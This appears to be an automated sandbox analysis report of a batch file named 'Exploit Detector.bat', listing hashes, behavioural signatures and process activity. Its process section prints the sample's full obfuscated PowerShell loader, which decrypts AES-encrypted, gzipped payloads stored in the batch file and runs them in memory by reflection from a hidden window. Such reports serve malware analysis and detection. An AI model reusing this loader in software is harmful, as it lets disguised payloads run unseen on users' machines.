Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
10-11-2024 09:17
Static task
static1
Behavioral task
behavioral1
Sample
Exploit Detector.bat
Resource
win7-20240903-en
windows7-x64
3 signatures
150 seconds
General
-
Target
Exploit Detector.bat
-
Size
156KB
-
MD5
c88c0f71749f8575068070333359f5b5
-
SHA1
af3cbd68266ab3b90bef8db45f8e22e1f4d9d121
-
SHA256
d1a6da3bb5b455c45056ff4b7e29270c29728e6e1add468a9a3e8ff88d6c3afb
-
SHA512
da549a0f953591baf4021dfb09f6b3afc0ff93dc58c430b90688583c5c43808393506389d97668b5f5d923b8258154d0a66c7f33ddaef7667bbf05fb45ef2fa4
-
SSDEEP
3072:pvmWfV9iV9C860i3eCYGBZ/Mf89esLbgVQBF7t+a39Qn4bo:Rdf2+nRBCf89/LESJSko
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2696 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2696 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2648 wrote to memory of 1912 2648 cmd.exe 31 PID 2648 wrote to memory of 1912 2648 cmd.exe 31 PID 2648 wrote to memory of 1912 2648 cmd.exe 31 PID 2648 wrote to memory of 2696 2648 cmd.exe 32 PID 2648 wrote to memory of 2696 2648 cmd.exe 32 PID 2648 wrote to memory of 2696 2648 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Exploit Detector.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('CaBNPFufqG/Ty3CUXy9EKmZ0sYpFg7Md+6rAZ0/TxhU='); $aes_var.IV=[System.Convert]::FromBase64String('S/RVoa3ixa8FZY/sBX5WEg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$hsUWk=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$yefxQ=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$duVIf=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($hsUWk, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $duVIf.CopyTo($yefxQ); $duVIf.Dispose(); $hsUWk.Dispose(); $yefxQ.Dispose(); $yefxQ.ToArray();}function execute_function($param_var,$param2_var){ IEX '$jXYNL=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$GLWuz=$jXYNL.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$GLWuz.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$AfZnh = 'C:\Users\Admin\AppData\Local\Temp\Exploit Detector.bat';$host.UI.RawUI.WindowTitle = $AfZnh;$BPwyt=[System.IO.File]::ReadAllText($AfZnh).Split([Environment]::NewLine);foreach ($MIYkU in $BPwyt) { if ($MIYkU.StartsWith('itiQGYtwhhNApDlOfuVM')) { $whOtj=$MIYkU.Substring(20); break; }}$payloads_var=[string[]]$whOtj.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "2⤵PID:1912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2696
-